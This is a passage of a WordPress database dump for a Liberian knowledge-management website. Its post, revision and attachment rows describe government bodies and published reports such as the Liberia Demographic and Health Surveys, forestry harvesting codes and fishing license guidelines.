14:30:14','',2704,'https://ekmsliberia.info/wp-content/uploads/2019/11/mof.jpg',0,'attachment','image/jpeg',0),(5014,42,'2022-09-14 14:30:22','2022-09-14 14:30:22','The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.\r\n\r\nAs custodian of the country’s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.','Ministry of Finance and Development Planning','','inherit','closed','closed','','2704-revision-v1','','','2022-09-14 14:30:22','2022-09-14 14:30:22','',2704,'https://ekmsliberia.info/?p=5014',0,'revision','',0),(5015,42,'2022-09-14 14:34:51','2022-09-14 14:34:51','','yds','','inherit','open','closed','','yds','','','2022-09-14 14:34:51','2022-09-14 14:34:51','',3041,'https://ekmsliberia.info/wp-content/uploads/2020/03/yds.jpg',0,'attachment','image/jpeg',0),(5016,42,'2022-09-14 14:37:19','2022-09-14 14:37:19','','green stewards','','inherit','open','closed','','green-stewards','','','2022-09-14 14:37:19','2022-09-14 14:37:19','',3006,'https://ekmsliberia.info/wp-content/uploads/2020/02/green-stewards.png',0,'attachment','image/png',0),(5017,42,'2022-09-14 14:40:37','2022-09-14 14:40:37','Ever Green Environmental Corporation is an independent business enterprise focused on advancing environmental practices, products and services for residences, businesses and the community,Ever Green Environmental has developed a suite of \"Green Management Services\". We help business, institutional, commercial and government operators to set up effective waste management and recycling programs.\r\n\r\nWaste Audits involve sorting and analysis of garbage collected during a sample period from all business operations. This audit focuses on:\r\n<ul class=\"htp\">\r\n 	<li>What is being thrown out?</li>\r\n 	<li>What percentage of items being thrown out could have been recycled?</li>\r\n 	<li>How much of what is thrown out is true garbage?</li>\r\n</ul>\r\nThis waste audit identifies waste reduction opportunities, and sets parameters for the business\'s own \"R4\" Objectives - Reduce, Reuse, Recycle, and Recover.','Evergreen Recycling Institute','','inherit','closed','closed','','3004-revision-v1','','','2022-09-14 14:40:37','2022-09-14 14:40:37','',3004,'https://ekmsliberia.info/?p=5017',0,'revision','',0),(5018,42,'2022-09-14 14:43:53','2022-09-14 14:43:53','','evergreen recycling','','inherit','open','closed','','evergreen-recycling','','','2022-09-14 14:43:53','2022-09-14 14:43:53','',3004,'https://ekmsliberia.info/wp-content/uploads/2020/02/evergreen-recycling.jpg',0,'attachment','image/jpeg',0),(5020,38,'2022-09-16 01:22:18','2022-09-16 01:22:18','The Liberia Demographic and Health Survey (LDHS) was a national-level survey conducted\r\nfrom February to July 1986, covering a sample of 5,239 women aged 15 to 49. The purpose of the\r\nsurvey was to provide planners and policymakers with data regarding fertility, family planning,\r\nand matemal and child health. A secondary objective was to collect baseline information for the\r\nSoutheast Region Primary Health Care Project.\r\nSurvey data indicate that fertility is high in Liberia, with women having an average of about\r\nsix and one-half births by the time they reach the end of their childbearing years. This level of fertility is found both from data on the mean number of children ever born to older women, as well\r\nas from the recent total fertility rate. Furthermore, it appears that fertility has been more or less\r\nconstant in the recent past, and may be increasing slightly. Women in urban areas and in Montserrado County have somewhat fewer children than women in other areas. The most significant difference in fertility rates is by educational level, where women with secondary or higher education\r\naverage fewer than 5 births per woman, as compared with 7 births for women with primary education. Childbearing in Liberia begins at an early age; over half of Liberian women have their first\r\nbirth before they reach age 20.','Demographic  and Health Survey  1986','','publish','closed','closed','','demographic-and-health-survey-1986','','','2022-09-16 01:22:18','2022-09-16 01:22:18','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5020',45,'document','',0),(5021,38,'2022-09-16 01:16:56','2022-09-16 01:16:56','','L','','inherit','open','closed','','l','','','2022-09-16 01:16:56','2022-09-16 01:16:56','',5020,'https://ekmsliberia.info/wp-content/uploads/2022/09/L.png',0,'attachment','image/png',0),(5022,38,'2022-09-16 01:18:26','2022-09-16 01:18:26','','20220506647856LDHS1986','','inherit','open','closed','','20220506647856ldhs1986','','','2022-09-16 01:18:26','2022-09-16 01:18:26','',5020,'https://ekmsliberia.info/wp-content/uploads/2022/09/20220506647856LDHS1986.pdf',0,'attachment','application/pdf',0),(5023,38,'2022-09-16 01:22:18','2022-09-16 01:22:18','The Liberia Demographic and Health Survey (LDHS) was a national-level survey conducted\r\nfrom February to July 1986, covering a sample of 5,239 women aged 15 to 49. The purpose of the\r\nsurvey was to provide planners and policymakers with data regarding fertility, family planning,\r\nand matemal and child health. A secondary objective was to collect baseline information for the\r\nSoutheast Region Primary Health Care Project.\r\nSurvey data indicate that fertility is high in Liberia, with women having an average of about\r\nsix and one-half births by the time they reach the end of their childbearing years. This level of fertility is found both from data on the mean number of children ever born to older women, as well\r\nas from the recent total fertility rate. Furthermore, it appears that fertility has been more or less\r\nconstant in the recent past, and may be increasing slightly. Women in urban areas and in Montserrado County have somewhat fewer children than women in other areas. The most significant difference in fertility rates is by educational level, where women with secondary or higher education\r\naverage fewer than 5 births per woman, as compared with 7 births for women with primary education. Childbearing in Liberia begins at an early age; over half of Liberian women have their first\r\nbirth before they reach age 20.','Demographic  and Health Survey  1986','','inherit','closed','closed','','5020-revision-v1','','','2022-09-16 01:22:18','2022-09-16 01:22:18','',5020,'https://ekmsliberia.info/?p=5023',0,'revision','',0),(5024,38,'2022-09-16 01:31:08','2022-09-16 01:31:08','The 2007 Liberia Demographic and Health Survey (LDHS) was undertaken by the Liberian\r\nInstitute of Statistic and Geo-Information Services (LISGIS), the Ministry of Health and Social\r\nWelfare, the Liberia Institute for Biomedical Research and the National AIDS Control Program\r\n(NACP). Macro International Inc. and the United Nations Population Fund (UNFPA) Country\r\nSupport Team provided technical support.\r\nThe survey was conducted because the Government of Liberia was keen to measure the extent\r\nof health-related changes in the Liberian society, especially to determine the basic profile of the\r\npopulation by age, sex, and education; fertility and child mortality rates; maternal and child health\r\nindicators; knowledge and attitudes of women and men about sexually transmitted diseases and\r\nHIV/AIDS; patterns of recent behavior regarding the use of condoms and other contraceptive\r\nmethods; and the prevalence of HIV infection.\r\nThe need to conduct a 2007 LDHS derived from two main factors. The first was the inability\r\nto conduct a census since 1984. The second derived from the need to update data collected in the 1986\r\nand 1999-2000 LDHS surveys and to monitor progress made on a number of key indicators related to\r\nthe Millennium Development Goals (MDGs), reproductive health, gender, and violence against\r\nwomen.','Liberia Demographic and Health Survey  2007','','publish','closed','closed','','liberia-demographic-and-health-survey-2007','','','2022-09-16 01:31:08','2022-09-16 01:31:08','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5024',44,'document','',0),(5025,38,'2022-09-16 01:27:11','2022-09-16 01:27:11','','202205066752167ldhs2007','','inherit','open','closed','','202205066752167ldhs2007','','','2022-09-16 01:27:11','2022-09-16 01:27:11','',5024,'https://ekmsliberia.info/wp-content/uploads/2022/09/202205066752167ldhs2007.pdf',0,'attachment','application/pdf',0),(5026,38,'2022-09-16 01:29:55','2022-09-16 01:29:55','','l2','','inherit','open','closed','','l2','','','2022-09-16 01:29:55','2022-09-16 01:29:55','',5024,'https://ekmsliberia.info/wp-content/uploads/2022/09/l2.png',0,'attachment','image/png',0),(5027,38,'2022-09-16 01:31:08','2022-09-16 01:31:08','The 2007 Liberia Demographic and Health Survey (LDHS) was undertaken by the Liberian\r\nInstitute of Statistic and Geo-Information Services (LISGIS), the Ministry of Health and Social\r\nWelfare, the Liberia Institute for Biomedical Research and the National AIDS Control Program\r\n(NACP). Macro International Inc. and the United Nations Population Fund (UNFPA) Country\r\nSupport Team provided technical support.\r\nThe survey was conducted because the Government of Liberia was keen to measure the extent\r\nof health-related changes in the Liberian society, especially to determine the basic profile of the\r\npopulation by age, sex, and education; fertility and child mortality rates; maternal and child health\r\nindicators; knowledge and attitudes of women and men about sexually transmitted diseases and\r\nHIV/AIDS; patterns of recent behavior regarding the use of condoms and other contraceptive\r\nmethods; and the prevalence of HIV infection.\r\nThe need to conduct a 2007 LDHS derived from two main factors. The first was the inability\r\nto conduct a census since 1984. The second derived from the need to update data collected in the 1986\r\nand 1999-2000 LDHS surveys and to monitor progress made on a number of key indicators related to\r\nthe Millennium Development Goals (MDGs), reproductive health, gender, and violence against\r\nwomen.','Liberia Demographic and Health Survey  2007','','inherit','closed','closed','','5024-revision-v1','','','2022-09-16 01:31:08','2022-09-16 01:31:08','',5024,'https://ekmsliberia.info/?p=5027',0,'revision','',0),(5028,38,'2022-09-16 01:38:50','2022-09-16 01:38:50','The External Trade Section of LISGIS is charged with the responsibility to collect, compile, process, analyze\r\nand disseminate External Trade Statistics in deriving the balance of Trade (BOT) figures from data received\r\nfrom Exports (FOB) and Imports (CIF) Values for the country.\r\nThe balance of Trade (BOT) of any country determines the status of the economy in terms of deficit or\r\nsurplus. The balance of Trade (BOT) statistics is also fueled in the Calculation of GDP estimates.','EXTERNAL TRADE ANNUAL REPORT','','publish','closed','closed','','external-trade-annual-report','','','2022-09-16 01:38:50','2022-09-16 01:38:50','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5028',43,'document','',0),(5029,38,'2022-09-16 01:35:28','2022-09-16 01:35:28','','l3','','inherit','open','closed','','l3','','','2022-09-16 01:35:28','2022-09-16 01:35:28','',5028,'https://ekmsliberia.info/wp-content/uploads/2022/09/l3.png',0,'attachment','image/png',0),(5030,38,'2022-09-16 01:36:19','2022-09-16 01:36:19','','202205066752167ldhs2007','','inherit','open','closed','','202205066752167ldhs2007-2','','','2022-09-16 01:36:19','2022-09-16 01:36:19','',5028,'https://ekmsliberia.info/wp-content/uploads/2022/09/202205066752167ldhs2007-1.pdf',0,'attachment','application/pdf',0),(5031,38,'2022-09-16 01:38:50','2022-09-16 01:38:50','The External Trade Section of LISGIS is charged with the responsibility to collect, compile, process, analyze\r\nand disseminate External Trade Statistics in deriving the balance of Trade (BOT) figures from data received\r\nfrom Exports (FOB) and Imports (CIF) Values for the country.\r\nThe balance of Trade (BOT) of any country determines the status of the economy in terms of deficit or\r\nsurplus. The balance of Trade (BOT) statistics is also fueled in the Calculation of GDP estimates.','EXTERNAL TRADE ANNUAL REPORT','','inherit','closed','closed','','5028-revision-v1','','','2022-09-16 01:38:50','2022-09-16 01:38:50','',5028,'https://ekmsliberia.info/?p=5031',0,'revision','',0),(5033,38,'2022-09-16 01:56:47','2022-09-16 01:56:47','The United Nations is an international organization founded in 1945. Currently made up of 193 Member States, the UN and its work are guided by the purposes and principles contained in its founding Charter.\r\n\r\nThe UN has evolved over the years to keep pace with a rapidly changing world.\r\n\r\nBut one thing has stayed the same: it remains the one place on Earth where all the world’s nations can gather together, discuss common problems, and find shared solutions that benefit all of humanity.','United Nations Liberia','','publish','closed','closed','','united-nations-liberia','','','2022-09-16 01:56:47','2022-09-16 01:56:47','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=5033',2,'institution','',0),(5034,38,'2022-09-16 01:48:30','2022-09-16 01:48:30','','images','','inherit','open','closed','','images','','','2022-09-16 01:56:47','2022-09-16 01:56:47','',5033,'https://ekmsliberia.info/wp-content/uploads/2022/09/images.png',0,'attachment','image/png',0),(5035,38,'2022-09-16 01:56:12','2022-09-16 01:56:12','','uni','','inherit','open','closed','','uni','','','2022-09-16 01:56:12','2022-09-16 01:56:12','',5033,'https://ekmsliberia.info/wp-content/uploads/2022/09/uni.png',0,'attachment','image/png',0),(5036,38,'2022-09-16 01:56:47','2022-09-16 01:56:47','The United Nations is an international organization founded in 1945. Currently made up of 193 Member States, the UN and its work are guided by the purposes and principles contained in its founding Charter.\r\n\r\nThe UN has evolved over the years to keep pace with a rapidly changing world.\r\n\r\nBut one thing has stayed the same: it remains the one place on Earth where all the world’s nations can gather together, discuss common problems, and find shared solutions that benefit all of humanity.','United Nations Liberia','','inherit','closed','closed','','5033-revision-v1','','','2022-09-16 01:56:47','2022-09-16 01:56:47','',5033,'https://ekmsliberia.info/?p=5036',0,'revision','',0),(5037,38,'2022-09-16 02:06:41','2022-09-16 02:06:41','The Common Country Assessment (CCA) has become a mandatory first step process for the preparation \r\nof the United Nations Development Assistance Framework (UNDAF). The CCA for Liberia serves two \r\npurposes, which include, informing priority settings for the UN Vision 2030 and providing the muchneeded evidence in the development of the Theory of Change for the next UN Programme of Support for \r\nthe Government of Liberia. This CCA was conducted between mid-January and end of March 2018. The \r\nmethodological approach of the CCA was guided by the UNDG (2017) guidance of CCA1\r\nin terms of \r\nassessment and analysis. The methodology for the development of the CCA included CCA thematic \r\narea reviews by stakeholders (Government, UN, Development Partners – DPs, Civil society \r\nOrganisations (CSOs and private sector). The stakeholders undertook a SWOT analysis of key themes \r\nand produced CCA thematic papers which were a key input to the development of this CCA. The CCA \r\nmethodology also included: an extensive desk review; intensive stakeholder consultations; field data \r\ncollection; data analysis and a stakeholder validation workshop. A total of 136 personnel from the \r\ngovernment, development partners, private sector and UNCT were interviewed. The limitations for the \r\ncompilation of the CCA included: access to compratice up-to-date survey data including sex \r\ndisaggregated statistics, lack of baseline for SDGs and a country in political transition which limited clarity \r\non a shared understanding of government prioitities.\r\n','Liberia Common Country Assessment 2018','','publish','closed','closed','','liberia-common-country-assessment-2018','','','2022-09-16 10:38:23','2022-09-16 10:38:23','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5037',42,'document','',0),(5038,38,'2022-09-16 02:03:29','2022-09-16 02:03:29','','Article page1 UN liberia','','inherit','open','closed','','article-page1-un-liberia','','','2022-09-16 02:03:29','2022-09-16 02:03:29','',5037,'https://ekmsliberia.info/wp-content/uploads/2022/09/Article-page1-UN-liberia.pdf',0,'attachment','application/pdf',0),(5039,38,'2022-09-16 02:04:06','2022-09-16 02:04:06','','un liberia','','inherit','open','closed','','un-liberia','','','2022-09-16 02:04:06','2022-09-16 02:04:06','',5037,'https://ekmsliberia.info/wp-content/uploads/2022/09/un-liberia.png',0,'attachment','image/png',0),(5040,38,'2022-09-16 02:06:41','2022-09-16 02:06:41','The Common Country Assessment (CCA) has become a mandatory first step process for the preparation \r\nof the United Nations Development Assistance Framework (UNDAF). The CCA for Liberia serves two \r\npurposes, which include, informing priority settings for the UN Vision 2030 and providing the muchneeded evidence in the development of the Theory of Change for the next UN Programme of Support for \r\nthe Government of Liberia. This CCA was conducted between mid-January and end of March 2018. The \r\nmethodological approach of the CCA was guided by the UNDG (2017) guidance of CCA1\r\nin terms of \r\nassessment and analysis. The methodology for the development of the CCA included CCA thematic \r\narea reviews by stakeholders (Government, UN, Development Partners – DPs, Civil society \r\nOrganisations (CSOs and private sector). The stakeholders undertook a SWOT analysis of key themes \r\nand produced CCA thematic papers which were a key input to the development of this CCA. The CCA \r\nmethodology also included: an extensive desk review; intensive stakeholder consultations; field data \r\ncollection; data analysis and a stakeholder validation workshop. A total of 136 personnel from the \r\ngovernment, development partners, private sector and UNCT were interviewed. The limitations for the \r\ncompilation of the CCA included: access to compratice up-to-date survey data including sex \r\ndisaggregated statistics, lack of baseline for SDGs and a country in political transition which limited clarity \r\non a shared understanding of government prioitities.\r\n','Liberia Common Country Assessment 2018','','inherit','closed','closed','','5037-revision-v1','','','2022-09-16 02:06:41','2022-09-16 02:06:41','',5037,'https://ekmsliberia.info/?p=5040',0,'revision','',0),(5042,38,'2022-09-16 10:46:09','2022-09-16 10:46:09','Early in 2008, industrial logging will restart in Liberia. As Managing Director of the Forestry Development Authority (FDA), I am pleased to see the progress that has been made to institute the reforms needed to ensure that logging no longer contributes to conflict in Liberia, and in fact contributes to the sustainable management of the country’s natural resources. In this new era of hope in Liberia, the FDA will insist that investors honor the new laws and regulations that have been developed from this reform so that together we can help play a positive role \r\nin the redevelopment of a country that has suffered too long from war. We have produced this briefing document to explain why the reforms were necessary and how logging will be conducted under our new law and regulations that govern the management of Liberia’s forests. We are pleased with the progress that has been made since 2006 when the Government of Liberia passed a reformed Forestry Law that forms the backbone of a new legal framework for logging. Since then, the FDA has adopted new international standards of logging to increase accountability and transparency in the sector, including requirements for chain of custody timber tracking, and forest management plans.','INVESTMENT IN THE LIBERIAN FOREST SECTOR','','publish','closed','closed','','investment-in-the-liberian-forest-sector','','','2022-09-16 10:46:09','2022-09-16 10:46:09','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5042',41,'document','',0),(5043,38,'2022-09-16 10:43:15','2022-09-16 10:43:15','','FDA2','','inherit','open','closed','','fda2','','','2022-09-16 10:43:15','2022-09-16 10:43:15','',5042,'https://ekmsliberia.info/wp-content/uploads/2022/09/FDA2.png',0,'attachment','image/png',0),(5044,38,'2022-09-16 10:44:18','2022-09-16 10:44:18','','doc_1320_1','','inherit','open','closed','','doc_1320_1','','','2022-09-16 10:44:18','2022-09-16 10:44:18','',5042,'https://ekmsliberia.info/wp-content/uploads/2022/09/doc_1320_1.pdf',0,'attachment','application/pdf',0),(5045,38,'2022-09-16 10:46:09','2022-09-16 10:46:09','Early in 2008, industrial logging will restart in Liberia. As Managing Director of the Forestry Development Authority (FDA), I am pleased to see the progress that has been made to institute the reforms needed to ensure that logging no longer contributes to conflict in Liberia, and in fact contributes to the sustainable management of the country’s natural resources. In this new era of hope in Liberia, the FDA will insist that investors honor the new laws and regulations that have been developed from this reform so that together we can help play a positive role \r\nin the redevelopment of a country that has suffered too long from war. We have produced this briefing document to explain why the reforms were necessary and how logging will be conducted under our new law and regulations that govern the management of Liberia’s forests. We are pleased with the progress that has been made since 2006 when the Government of Liberia passed a reformed Forestry Law that forms the backbone of a new legal framework for logging. Since then, the FDA has adopted new international standards of logging to increase accountability and transparency in the sector, including requirements for chain of custody timber tracking, and forest management plans.','INVESTMENT IN THE LIBERIAN FOREST SECTOR','','inherit','closed','closed','','5042-revision-v1','','','2022-09-16 10:46:09','2022-09-16 10:46:09','',5042,'https://ekmsliberia.info/?p=5045',0,'revision','',0),(5046,38,'2022-09-16 11:00:16','2022-09-16 11:00:16','','Guidelines for Forest Management Planning in Liberia','','publish','closed','closed','','guidelines-for-forest-management-planning-in-liberia','','','2022-09-16 11:00:16','2022-09-16 11:00:16','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5046',40,'document','',0),(5047,38,'2022-09-16 10:55:04','2022-09-16 10:55:04','','fda Guardline','','inherit','open','closed','','fda-guardline','','','2022-09-16 10:55:04','2022-09-16 10:55:04','',5046,'https://ekmsliberia.info/wp-content/uploads/2022/09/fda-Guardline.png',0,'attachment','image/png',0),(5048,38,'2022-09-16 10:57:29','2022-09-16 10:57:29','','Forest_Mgmt_Plan_Guidelines_2009_20','','inherit','open','closed','','forest_mgmt_plan_guidelines_2009_20','','','2022-09-16 10:57:29','2022-09-16 10:57:29','',5046,'https://ekmsliberia.info/wp-content/uploads/2022/09/Forest_Mgmt_Plan_Guidelines_2009_20.pdf',0,'attachment','application/pdf',0),(5049,38,'2022-09-16 11:00:16','2022-09-16 11:00:16','','Guidelines for Forest Management Planning in Liberia','','inherit','closed','closed','','5046-revision-v1','','','2022-09-16 11:00:16','2022-09-16 11:00:16','',5046,'https://ekmsliberia.info/?p=5049',0,'revision','',0),(5050,38,'2022-09-16 11:08:42','2022-09-16 11:08:42','The FDA Protocols and Procedures in receiving and accessing public information from the FDA \r\nis patterned after the current legislated Freedom of Information Act of 2010. It provides userfriendly step by step descriptions of both the internal and external available channels through \r\nwhich stakeholders and the general public can request and obtain information and or document \r\nfrom the Forestry Development Authority. \r\nThe objectives of these protocols and procedures are to ensure public access to information as \r\nprovided for under Section 1.5 of the Freedom of Information Act as well as inform interested \r\nparties about basic routine processes in obtaining information from the FDA.\r\nThese protocols consist of two components a) the external request mechanisms that enable easy \r\naccess by the general public and b) internal protocol through which provide for the domestic \r\nreview processes of FDA for authorization.\r\nThe Freedom of Information Act of 2010:\r\nThe Freedom of Information Act was legislated by the National Legislature in 2010 in realizing \r\nthat access to information is a fundamental right guaranteed by the Constitution of Liberia and \r\nthe Universal Declaration of Human Rights as well as the African Charter on Human and \r\nPeople’s Rights.\r\nIt also realized that the right to access information encompasses the rights to request and receive \r\ninformation, especially information concerning public interest. The Act also acknowledges that\r\naccess to information is indispensable to genuine democracy and good governance as a whole.\r\nArticle 15 (c) of the Constitution of Liberia also provides that no limitation shall be placed on the \r\npublic right to be informed about the government, its functions as well as functionaries.\r\nSection 1.5 of the Freedom of Information Act of 2010 has four basic objectives as follows:','Freedom of Information Protocols and  Procedures','','publish','closed','closed','','freedom-of-information-protocols-and-procedures','','','2022-09-16 11:08:42','2022-09-16 11:08:42','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5050',39,'document','',0),(5051,38,'2022-09-16 11:06:30','2022-09-16 11:06:30','','FDA FREEDOM','','inherit','open','closed','','fda-freedom','','','2022-09-16 11:06:30','2022-09-16 11:06:30','',5050,'https://ekmsliberia.info/wp-content/uploads/2022/09/FDA-FREEDOM.png',0,'attachment','image/png',0),(5052,38,'2022-09-16 11:07:28','2022-09-16 11:07:28','','FOI_Protocols_for_FDA..._76','','inherit','open','closed','','foi_protocols_for_fda-_76','','','2022-09-16 11:07:28','2022-09-16 11:07:28','',5050,'https://ekmsliberia.info/wp-content/uploads/2022/09/FOI_Protocols_for_FDA..._76.pdf',0,'attachment','application/pdf',0),(5053,38,'2022-09-16 11:08:42','2022-09-16 11:08:42','The FDA Protocols and Procedures in receiving and accessing public information from the FDA \r\nis patterned after the current legislated Freedom of Information Act of 2010. It provides userfriendly step by step descriptions of both the internal and external available channels through \r\nwhich stakeholders and the general public can request and obtain information and or document \r\nfrom the Forestry Development Authority. \r\nThe objectives of these protocols and procedures are to ensure public access to information as \r\nprovided for under Section 1.5 of the Freedom of Information Act as well as inform interested \r\nparties about basic routine processes in obtaining information from the FDA.\r\nThese protocols consist of two components a) the external request mechanisms that enable easy \r\naccess by the general public and b) internal protocol through which provide for the domestic \r\nreview processes of FDA for authorization.\r\nThe Freedom of Information Act of 2010:\r\nThe Freedom of Information Act was legislated by the National Legislature in 2010 in realizing \r\nthat access to information is a fundamental right guaranteed by the Constitution of Liberia and \r\nthe Universal Declaration of Human Rights as well as the African Charter on Human and \r\nPeople’s Rights.\r\nIt also realized that the right to access information encompasses the rights to request and receive \r\ninformation, especially information concerning public interest. The Act also acknowledges that\r\naccess to information is indispensable to genuine democracy and good governance as a whole.\r\nArticle 15 (c) of the Constitution of Liberia also provides that no limitation shall be placed on the \r\npublic right to be informed about the government, its functions as well as functionaries.\r\nSection 1.5 of the Freedom of Information Act of 2010 has four basic objectives as follows:','Freedom of Information Protocols and  Procedures','','inherit','closed','closed','','5050-revision-v1','','','2022-09-16 11:08:42','2022-09-16 11:08:42','',5050,'https://ekmsliberia.info/?p=5053',0,'revision','',0),(5054,38,'2022-09-16 11:20:26','2022-09-16 11:20:26','The Forestry Development Authority (FDA) has developed this Code of Practice for Timber Harvesting to provide a clear set of guidelines to help foresters and logging companies select practices to be followed when carrying out harvesting operations under forest management contracts (FMC) and timber sales contracts (TSC). The purpose of these guidelines is to prescribe a code of timber harvesting practice, to which the FDA requires all contract holders to adhere. The planning requirements for forest areas under FMCs and TSCs are different with respect to some of the activities. However, the requirements regarding good logging practice remain the same and these are described in this code. Practices that conform to the regulations or guidelines should, at least in theory, achieve a desired outcome such as the harvest of commercial timber from a specified area of forest in a way that meets standards for sustainable forest management. Sustainable forest management recognizes the importance of all products and services \r\nprovided by the forest, including timber, water quality, soils, biodiversity, and the livelihood of people that live or work in the forest. Liberia’s response to these concerns has been to develop principles, policies and \r\nguidelines for improved forest management and timber harvesting practices. This is reflected in the new forest policy, forest legislation, forest management guidelines and \r\ncodes of practice.','Code of Forest Harvesting Practices','','publish','closed','closed','','code-of-forest-harvesting-practices','','','2022-09-16 11:20:26','2022-09-16 11:20:26','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5054',38,'document','',0),(5055,38,'2022-09-16 11:16:14','2022-09-16 11:16:14','','FDA','','inherit','open','closed','','fda','','','2022-09-16 11:16:14','2022-09-16 11:16:14','',5054,'https://ekmsliberia.info/wp-content/uploads/2022/09/FDA.png',0,'attachment','image/png',0),(5056,38,'2022-09-16 11:17:33','2022-09-16 11:17:33','','CODE_OF_HARVESTING_PRACTICE__2007_19','','inherit','open','closed','','code_of_harvesting_practice__2007_19','','','2022-09-16 11:17:33','2022-09-16 11:17:33','',5054,'https://ekmsliberia.info/wp-content/uploads/2022/09/CODE_OF_HARVESTING_PRACTICE__2007_19.pdf',0,'attachment','application/pdf',0),(5057,38,'2022-09-16 11:20:26','2022-09-16 11:20:26','The Forestry Development Authority (FDA) has developed this Code of Practice for Timber Harvesting to provide a clear set of guidelines to help foresters and logging companies select practices to be followed when carrying out harvesting operations under forest management contracts (FMC) and timber sales contracts (TSC). The purpose of these guidelines is to prescribe a code of timber harvesting practice, to which the FDA requires all contract holders to adhere. The planning requirements for forest areas under FMCs and TSCs are different with respect to some of the activities. However, the requirements regarding good logging practice remain the same and these are described in this code. Practices that conform to the regulations or guidelines should, at least in theory, achieve a desired outcome such as the harvest of commercial timber from a specified area of forest in a way that meets standards for sustainable forest management. Sustainable forest management recognizes the importance of all products and services \r\nprovided by the forest, including timber, water quality, soils, biodiversity, and the livelihood of people that live or work in the forest. Liberia’s response to these concerns has been to develop principles, policies and \r\nguidelines for improved forest management and timber harvesting practices. This is reflected in the new forest policy, forest legislation, forest management guidelines and \r\ncodes of practice.','Code of Forest Harvesting Practices','','inherit','closed','closed','','5054-revision-v1','','','2022-09-16 11:20:26','2022-09-16 11:20:26','',5054,'https://ekmsliberia.info/?p=5057',0,'revision','',0),(5058,38,'2022-09-16 11:26:58','2022-09-16 11:26:58','','Application Guidelines for Obtaining Fishing  License & Permit','','publish','closed','closed','','application-guidelines-for-obtaining-fishing-license-permit','','','2022-09-16 11:26:58','2022-09-16 11:26:58','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5058',37,'document','',0),(5059,38,'2022-09-16 11:24:44','2022-09-16 11:24:44','','NaFAA','','inherit','open','closed','','nafaa-4','','','2022-09-16 11:24:44','2022-09-16 11:24:44','',5058,'https://ekmsliberia.info/wp-content/uploads/2022/09/NaFAA.png',0,'attachment','image/png',0),(5060,38,'2022-09-16 11:25:40','2022-09-16 11:25:40','','GUIDELINES FOR FISHING LICENSE - NEW','','inherit','open','closed','','guidelines-for-fishing-license-new','','','2022-09-16 11:25:40','2022-09-16 11:25:40','',5058,'https://ekmsliberia.info/wp-content/uploads/2022/09/GUIDELINES-FOR-FISHING-LICENSE-NEW.pdf',0,'attachment','application/pdf',0),(5061,38,'2022-09-16 11:26:58','2022-09-16 11:26:58','','Application Guidelines for Obtaining Fishing  License & Permit','','inherit','closed','closed','','5058-revision-v1','','','2022-09-16 11:26:58','2022-09-16 11:26:58','',5058,'https://ekmsliberia.info/?p=5061',0,'revision','',0),(5062,38,'2022-09-16 11:39:06','2022-09-16 11:39:06','The 2019-20 Liberia Demographic and Health Survey (2019-20 LDHS) was implemented by the Liberia Institute \r\nof Statistics and Geo-Information Services (LISGIS). Data collection lasted from October 2019 to February \r\n2020. Funding for the 2019-20 LDHS was provided by the United States Agency for International Development \r\n(USAID). Additional funding was provided by the United States Centers for Disease Control and Prevention \r\n(CDC), the United Nations Population Fund (UNFPA), UNICEF, the Embassy of Ireland (Irish Aid), the United \r\nNations Development Programme (UNDP), the World Health Organization (WHO), UN Women, and the Global \r\nAlliance for Vaccine and Immunization (GAVI). ICF provided technical assistance through The DHS Program, \r\na USAID-funded project providing support and technical assistance in the implementation of population and \r\nhealth surveys in countries worldwide. Additional information about the 2019-20 LDHS may be obtained from the Liberia Institute of Statistics and Geo-Information Services (LISGIS), Statistics House, Capitol Hill, P.O. Box 629, Monrovia, Liberia; telephone: +231 886 560 435/+231 770 129 883; internet: www.lisgis.net. Information about The DHS Program may be obtained from ICF, 530 Gaither Road, Suite 500, Rockville, MD 20850, USA; telephone: +1-301-407-6500; fax: +1-301-407-6501; email: info@DHSprogram.com; internet: www.DHSprogram.com.Suggested citation:Liberia Institute of Statistics and Geo-Information Services (LISGIS), Ministry of Health [Liberia], and ICF. 2021. Liberia Demographic and Health Survey 2019-20. Monrovia, Liberia and Rockville, Maryland, USA: Liberia Institute of Statistics and Geo-Information Services (LISGIS), Ministry of Health, and ICF','Demographic and  Health Survey 2019-20','','publish','closed','closed','','demographic-and-health-survey-2019-20','','','2022-09-16 11:39:06','2022-09-16 11:39:06','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5062',36,'document','',0),(5063,38,'2022-09-16 11:32:46','2022-09-16 11:32:46','','L 2019-20','','inherit','open','closed','','l-2019-20','','','2022-09-16 11:32:46','2022-09-16 11:32:46','',5062,'https://ekmsliberia.info/wp-content/uploads/2022/09/L-2019-20.png',0,'attachment','image/png',0),(5064,38,'2022-09-16 11:35:22','2022-09-16 11:35:22','','202205091307244dhl2019real','','inherit','open','closed','','202205091307244dhl2019real','','','2022-09-16 11:35:22','2022-09-16 11:35:22','',5062,'https://ekmsliberia.info/wp-content/uploads/2022/09/202205091307244dhl2019real.pdf',0,'attachment','application/pdf',0),(5065,38,'2022-09-16 11:39:06','2022-09-16 11:39:06','The 2019-20 Liberia Demographic and Health Survey (2019-20 LDHS) was implemented by the Liberia Institute \r\nof Statistics and Geo-Information Services (LISGIS). Data collection lasted from October 2019 to February \r\n2020. Funding for the 2019-20 LDHS was provided by the United States Agency for International Development \r\n(USAID). Additional funding was provided by the United States Centers for Disease Control and Prevention \r\n(CDC), the United Nations Population Fund (UNFPA), UNICEF, the Embassy of Ireland (Irish Aid), the United \r\nNations Development Programme (UNDP), the World Health Organization (WHO), UN Women, and the Global \r\nAlliance for Vaccine and Immunization (GAVI). ICF provided technical assistance through The DHS Program, \r\na USAID-funded project providing support and technical assistance in the implementation of population and \r\nhealth surveys in countries worldwide. Additional information about the 2019-20 LDHS may be obtained from the Liberia Institute of Statistics and Geo-Information Services (LISGIS), 